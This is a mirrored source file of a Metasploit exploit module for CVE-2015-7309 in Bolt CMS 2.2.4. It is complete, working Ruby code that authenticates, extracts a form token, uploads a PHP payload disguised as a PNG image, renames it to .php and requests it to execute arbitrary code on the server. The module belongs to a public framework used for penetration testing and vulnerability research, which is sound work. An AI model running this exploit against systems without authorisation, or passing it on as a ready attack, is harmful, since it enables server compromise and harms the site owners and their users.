Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/http/bolt_file_upload.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::FileDropper

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CMS Bolt File Upload Vulnerability',

17
        'Description' => %q{

18
          Bolt CMS contains a flaw that allows an authenticated remote

19
          attacker to execute arbitrary PHP code. This module was

20
          tested on version 2.2.4.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'Tim Coen', # Vulnerability Disclosure

25
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module

26
        ],

27
        'References' => [

28
          ['CVE', '2015-7309'],

29
          ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']

30
        ],

31
        'DisclosureDate' => '2015-08-17',

32
        'Platform' => 'php',

33
        'Arch' => ARCH_PHP,

34
        'Targets' => [['Bolt 2.2.4', {}]],

35
        'DefaultTarget' => 0,

36
        'Notes' => {

37
          'Reliability' => UNKNOWN_RELIABILITY,

38
          'Stability' => UNKNOWN_STABILITY,

39
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

40
        }

41
      )

42
    )

43


44
    register_options(

45
      [

46
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),

47
        OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),

48
        OptString.new('USERNAME', [true, 'The username to authenticate with']),

49
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])

50
      ]

51
    )

52
  end

53


54
  def check

55
    cookie = bolt_login(username, password)

56
    return Exploit::CheckCode::Detected unless cookie

57


58
    res = send_request_cgi(

59
      'method' => 'GET',

60
      'uri' => normalize_uri(target_uri.path, 'bolt'),

61
      'cookie' => cookie

62
    )

63


64
    if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')

65
      return Exploit::CheckCode::Vulnerable

66
    end

67


68
    Exploit::CheckCode::Safe

69
  end

70


71
  def username

72
    datastore['USERNAME']

73
  end

74


75
  def password

76
    datastore['PASSWORD']

77
  end

78


79
  def fname

80
    datastore['FOLDERNAME']

81
  end

82


83
  def bolt_login(user, pass)

84
    res = send_request_cgi(

85
      'method' => 'GET',

86
      'uri' => normalize_uri(target_uri.path, 'bolt', 'login')

87
    )

88


89
    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

90


91
    session_cookie = res.get_cookies

92
    vprint_status("Logging in...")

93
    res = send_request_cgi(

94
      'method' => 'POST',

95
      'uri' => normalize_uri(target_uri.path, 'bolt', 'login'),

96
      'cookie' => session_cookie,

97
      'vars_post' => {

98
        'username' => user,

99
        'password' => pass,

100
        'action' => 'login'

101
      }

102
    )

103


104
    return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')

105


106
    nil

107
  end

108


109
  def get_token(cookie, fname)

110
    res = send_request_cgi(

111
      'method' => 'GET',

112
      'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),

113
      'cookie' => cookie

114
    )

115


116
    if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /

117
      return Regexp.last_match[1]

118
    end

119


120
    nil

121
  end

122


123
  def rename_payload(cookie, payload, fname)

124
    res = send_request_cgi(

125
      'method' => 'POST',

126
      'uri' => normalize_uri(target_uri.path, 'async', 'renamefile'),

127
      'vars_post' => {

128
        'namespace' => 'theme',

129
        'parent' => fname,

130
        'oldname' => "#{payload}.png",

131
        'newname' => "#{payload}.php"

132
      },

133
      'cookie' => cookie

134
    )

135


136
    return true if res && res.code == 200 && res.body.include?('1')

137


138
    nil

139
  end

140


141
  def exploit

142
    vprint_status("Authenticating using #{username}:#{password}")

143


144
    cookie = bolt_login(username, password)

145
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?

146
    vprint_good("Authenticated with Bolt.")

147


148
    token = get_token(cookie, fname)

149
    fail_with(Failure::Unknown, 'No token found.') if token.nil?

150
    vprint_good("Token \"#{token}\" found.")

151


152
    vprint_status("Preparing payload...")

153
    payload_name = Rex::Text.rand_text_alpha_lower(10)

154


155
    data = Rex::MIME::Message.new

156
    data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")

157
    data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')

158
    post_data = data.to_s

159


160
    vprint_status("Uploading payload...")

161
    res = send_request_cgi(

162
      'method' => 'POST',

163
      'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),

164
      'ctype' => "multipart/form-data; boundary=#{data.bound}",

165
      'data' => post_data,

166
      'cookie' => cookie

167
    )

168


169
    fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302

170
    vprint_good("Uploaded the payload.")

171


172
    rename = rename_payload(cookie, payload_name, fname)

173
    fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?

174


175
    php_file_name = "#{payload_name}.php"

176
    payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)

177
    vprint_status("Parsed response.")

178


179
    register_files_for_cleanup(php_file_name)

180
    vprint_status("Executing the payload at #{payload_url}.")

181
    send_request_cgi(

182
      'uri' => payload_url,

183
      'method' => 'GET'

184
    )

185
  end

186
end

187


188